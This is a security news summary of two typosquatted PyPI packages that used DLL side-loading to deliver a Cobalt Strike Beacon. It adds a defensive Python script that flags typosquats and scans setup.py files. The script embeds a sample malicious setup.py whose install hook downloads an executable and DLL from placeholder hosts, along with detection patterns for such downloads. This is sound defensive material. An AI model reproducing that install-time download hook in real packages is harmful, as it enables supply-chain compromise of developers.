
New PyPI Packages Caught Using Covert Side-Loading Tactics

Recent research has revealed that two malicious packages made it onto the Python Package Index (PyPI) repository and relied on DLL side-loading. The packages NP6HelperHttptest and NP6HelperHttper were downloaded 537 and 166 times, respectively, before they were removed. They used DLL side-loading to evade security software and execute malicious code.

The packages are typosquats of the legitimate helper tools NP6HelperHttp and NP6HelperConfig, published by ChapsVision, a marketing automation solution provider. The fake packages were designed to trick developers into downloading the rogue counterparts. DLL side-loading was used to keep the malicious code from being detected, as seen earlier in the case of a package called aabquerys.

The malicious libraries contain a setup.py script that downloads two files: an executable from Beijing-based Kingsoft Corporation (“ComServer.exe”) that is vulnerable to DLL side-loading, and the malicious DLL to be side-loaded (“dgdeskband64.dll”). Once the DLL is side-loaded, the malware aims to avoid detection and reaches out to an attacker-controlled domain (“us.archive-ubuntu[.]top”) to fetch a GIF file that is actually shellcode for a Cobalt Strike Beacon.
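The two defender-side checks that follow from this story are catching the typosquat before it is installed and catching a setup.py that reaches out to the network at install time. The script below is an added example written for this summary; it is not code from the article, ChapsVision or PyPI. The trusted allowlist, the edit-distance threshold (one third of the trusted name's length, at least 1) and the sample setup.py are all constructed for illustration, and the URLs in the sample are placeholders rather than the article's real indicators.

```python
"""Pre-install checks inspired by the NP6HelperHttptest / NP6HelperHttper case.

Added example; not code from the article or from the projects it mentions.
"""
import re

# Constructed allowlist: the two legitimate ChapsVision helpers named in the
# article plus two common packages so the threshold logic has short names to test.
TRUSTED = {"np6helperhttp", "np6helperconfig", "requests", "numpy"}

# Constructed indicator patterns for install-time behaviour worth a closer look.
SETUP_PY_INDICATORS = {
    "install-time download": r"urlretrieve|urlopen\(|requests\.get\(",
    "remote URL": r"https?://",
    "custom install command": r"cmdclass\s*=",
}


def normalize(name: str) -> str:
    """PEP 503 style normalization: fold case and collapse -, _ and . runs."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(requested_names, trusted=TRUSTED):
    """Return (requested, closest_trusted, distance) for names that are close to,
    but not equal to, a trusted name. The allowed distance scales with the
    trusted name's length so short names like 'numpy' only match one-character
    slips (assumed heuristic, tune to taste)."""
    findings = []
    for requested in requested_names:
        norm = normalize(requested)
        if norm in trusted:
            continue
        closest = min(trusted, key=lambda t: levenshtein(norm, t))
        dist = levenshtein(norm, closest)
        if dist <= max(1, len(closest) // 3):
            findings.append((requested, closest, dist))
    return findings


def scan_setup_py(source: str):
    """Return (line_number, indicator_label) pairs for lines of a setup.py that
    match one of SETUP_PY_INDICATORS. Purely static; nothing is executed."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for label, pattern in SETUP_PY_INDICATORS.items():
            if re.search(pattern, line):
                hits.append((lineno, label))
    return hits


# Constructed sample of the pattern the article describes: a custom install
# command that fetches two files while the package is being installed.
SAMPLE_SETUP_PY = """\
from setuptools import setup
from setuptools.command.install import install
import urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        # constructed placeholder addresses, not the article's real indicators
        urllib.request.urlretrieve("http://example.invalid/ComServer.exe", "ComServer.exe")
        urllib.request.urlretrieve("http://example.invalid/dgdeskband64.dll", "dgdeskband64.dll")

setup(name="np6helperhttptest", version="0.1", cmdclass={"install": PostInstall})
"""

if __name__ == "__main__":
    wanted = ["NP6HelperHttptest", "NP6HelperHttper", "np6helperhttp", "flask"]
    for requested, closest, dist in typosquat_candidates(wanted):
        print(f"possible typosquat: {requested!r} is {dist} edits from trusted {closest!r}")
    for lineno, label in scan_setup_py(SAMPLE_SETUP_PY):
        print(f"setup.py line {lineno}: {label}")
```

Run it against a requirements file by feeding the package names to `typosquat_candidates` and each downloaded sdist's setup.py to `scan_setup_py`; a hit from either is a reason to pause the install and look, not proof of malice, since legitimate packages occasionally use custom install commands too.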

This discovery suggests that software supply chain threats are expanding, and development organizations must be aware of the risks related to supply chain security and open-source package repositories. Even organizations that do not use open-source package repositories can be affected, since threat actors may misuse them to impersonate companies and their software products and tools.

Want to read more? Check out the original article at The Hacker News!


Deitasoft © 2024. All Rights Reserved.